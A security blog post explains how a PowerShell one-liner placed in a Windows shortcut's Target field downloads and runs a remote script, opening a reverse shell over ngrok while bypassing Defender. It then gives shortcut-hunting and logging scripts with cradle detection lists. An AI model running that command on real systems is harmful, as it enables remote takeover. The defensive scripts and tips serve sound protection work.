Security Tips Against Attacks on Windows 11 and Microsoft Edge via WAN
NOTE: This blog post was written for education and to raise awareness about information security. Use the technique described here only within authorized, legal engagements (white-box or grey-box tests). The main FOCUS is the SECURITY TIPS section at the end; be sure to read that part.
Test Environment Versions
- PowerShell version (command: Get-Host): 5.1.22621.169
- Windows version (command: [Environment]::OSVersion): Windows 11 Pro 10.0.22621
- Microsoft Defender signature version (command: Get-MpComputerStatus): AntivirusSignatureVersion 1.377.509.0
The fundamental technique is to get a reverse shell by placing a PowerShell one-liner in the Target field of an application shortcut (GIF 1).
I used ngrok for the WAN-to-LAN attack. I have mentioned the installation steps in other sections.
Three scripts were used. The first was Powercat, which establishes the reverse shell. The second bypasses Microsoft Defender. The third merges the first two and adds some social engineering touches: configuring the terminal window size, closing the terminal window, and opening Microsoft Edge so the victim sees a browser rather than a console.
My PowerShell Script Link
The ngrok TCP URL and port number must be changed in the PowerShell script before use.
Suspicious PowerShell Script For Application Target Field
powershell.exe -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/OsmanKandemir/PowerSTest/main/run.ps1');run"
Test
The simulation was completed over TCP, with ngrok forwarding the port from WAN to LAN. From the user's point of view everything looks fine, yet Defender and AV have been bypassed (as shown in GIF 2). Kali Linux runs in VMware; Kali and the Windows 11 machine are on the same local network, but the connection travels over the WAN through the ngrok tunnel.
A malicious actor can keep a persistent reverse shell using this method.
The small difference from other methods is that the script reconnects when the connection drops, so a closed window or a network interruption does not end the session.
Social Engineering
A malicious actor with a few seconds at an unlocked, unattended computer could quickly type the one-liner into the Target field of an application shortcut. The shortcut still launches the expected program, so nothing looks wrong to the user.
The PowerShell one-liner (the "Suspicious PowerShell Script For Application Target Field" above) downloads run.ps1 with DownloadString, executes it in memory with IEX without ever writing it to disk, and then calls run to start the reverse shell.
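A defender's first question after reading this is "which shortcuts on my machine already carry such a one-liner?". The script below is an added example, not code from the original post or from the PowerSTest repository; it walks the Desktop, Start Menu and Startup folders, reads each .lnk through the WScript.Shell COM object and flags shortcuts whose target or arguments combine a PowerShell host with a download-cradle indicator. The indicator list and the folder list are my own choices, not something the post specifies.

```powershell
# Added example (not from the original post): hunt for shortcuts whose Target
# or Arguments carry a PowerShell download cradle like the one shown above.
# Assumptions: Windows PowerShell 5.1 on Windows 11, run as the interactive
# user; the WScript.Shell COM object is available (it is on stock Windows).

# Folders where a walk-up attacker would edit or plant a shortcut (assumed list).
$searchRoots = @(
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('CommonDesktopDirectory'),
    [Environment]::GetFolderPath('StartMenu'),
    [Environment]::GetFolderPath('CommonStartMenu'),
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
) | Where-Object { $_ -and (Test-Path $_) }

# Strings taken from the one-liner in this post plus common cradle variants.
# Matching is case-insensitive. '-enc' also catches -EncodedCommand because
# PowerShell accepts any unique prefix of a parameter name.
$cradleIndicators = @(
    'IEX', 'Invoke-Expression', 'DownloadString', 'DownloadFile', 'Net.WebClient',
    'Invoke-WebRequest', 'iwr ', 'curl ', '-enc', '-nop', '-w hidden',
    'WindowStyle', 'bypass', 'ngrok', 'http'
)

$shell = New-Object -ComObject WScript.Shell

$findings = foreach ($root in $searchRoots) {
    Get-ChildItem -Path $root -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $lnk  = $shell.CreateShortcut($_.FullName)
        $line = "$($lnk.TargetPath) $($lnk.Arguments)"

        # A plain shortcut to powershell.exe is normal; a shortcut that makes
        # PowerShell fetch and execute remote code is not. Require both.
        $isPowerShell = $line -match 'powershell|pwsh'
        $hits = @($cradleIndicators | Where-Object { $line -match [regex]::Escape($_) })

        if ($isPowerShell -and $hits.Count -gt 0) {
            [pscustomobject]@{
                Shortcut    = $_.FullName
                Modified    = $_.LastWriteTime
                Target      = $lnk.TargetPath
                Arguments   = $lnk.Arguments
                # 7 = minimized, 3 = maximized, 1 = normal; a minimized console
                # is a cheap way to hide the reverse shell window.
                WindowStyle = $lnk.WindowStyle
                Indicators  = ($hits -join ', ')
            }
        }
    }
}

if ($findings) {
    $findings | Format-List
} else {
    "No shortcuts with a PowerShell download cradle found under: $($searchRoots -join '; ')"
}
```

Run it as the user whose shortcuts you care about; the common (all-users) folders need no elevation to read. The Modified timestamp is the most useful triage field: a Start Menu shortcut that changed minutes after someone walked away from an unlocked desk deserves a look even if the indicator list misses a new cradle variant.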
Security Tips
- If you leave your computer, lock the screen. The whole technique depends on a few seconds at an unlocked desktop.
- If you see a suspicious CMD or PowerShell window appear, kill the process from Task Manager; because the script reconnects on its own, also check for a process that keeps coming back.
- You can block "powershell.exe" in the Local Group Policy Editor (Figure 1). Note that this policy matches only the file name, so a renamed copy of powershell.exe or pwsh.exe still runs; for real enforcement use AppLocker or WDAC, and turn on PowerShell Script Block Logging so that code pulled in with IEX is recorded even when it never touches disk.
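The Group Policy block in Figure 1 is a speed bump rather than a control, so as an added example (my code, not the post's) here is the hardening and audit step I would pair with it: enable Script Block and Module Logging through the same policy registry keys a GPO would set, confirm the values, and then search the last week of Event ID 4104 records for the download-cradle strings used by the one-liner in this post. The seven-day window and the regex are assumptions you can tune.

```powershell
# Added example (not from the original post): log PowerShell activity and hunt
# for download cradles instead of relying on a file-name block of powershell.exe.
# Assumptions: elevated Windows PowerShell 5.1 on a non-domain Windows 11 host,
# so the policy values are written locally (a domain GPO sets the same keys).

# 1. Script Block Logging records every executed script block, including code
#    loaded with IEX/DownloadString, as Event ID 4104 in
#    Microsoft-Windows-PowerShell/Operational.
$sblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $sblKey -Force | Out-Null
Set-ItemProperty -Path $sblKey -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 2. Module Logging records pipeline execution details for the listed modules;
#    '*' means all of them.
$mlKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
New-Item -Path "$mlKey\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path $mlKey -Name EnableModuleLogging -Value 1 -Type DWord
Set-ItemProperty -Path "$mlKey\ModuleNames" -Name '*' -Value '*' -Type String

# 3. Verify that both settings took effect.
Get-ItemProperty -Path $sblKey | Select-Object EnableScriptBlockLogging
Get-ItemProperty -Path $mlKey  | Select-Object EnableModuleLogging

# 4. Hunt recent 4104 events for cradle indicators. The pattern mirrors the
#    one-liner shown earlier in this post plus the usual encoded-command variant.
$cradlePattern = 'DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression|\bIEX\b|FromBase64String|ngrok'
$since = (Get-Date).AddDays(-7)   # assumed look-back window

Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = $since
} -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match $cradlePattern } |
    Select-Object TimeCreated,
                  @{ n = 'User';    e = { $_.UserId } },
                  @{ n = 'Snippet'; e = {
                      # Collapse whitespace and keep the first 160 characters
                      # so the table stays readable; open the event for the rest.
                      $m = $_.Message -replace '\s+', ' '
                      $m.Substring(0, [Math]::Min(160, $m.Length))
                  } } |
    Format-Table -AutoSize -Wrap
```

Events written before step 1 will not exist, so run the hunt again after the logging has been on for a while. Logging does not stop the reverse shell by itself; it gives you the 4104 record that shows exactly which script was pulled from which URL, which is what you need to tell a walk-up prank from a real intrusion.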
Stay Safe.
Resources
1-https://github.com/OsmanKandemir/PowerSTest/blob/main/run.ps1
2-https://github.com/besimorhino/powercat
3-https://github.com/aloksaurabh/OffenPowerSh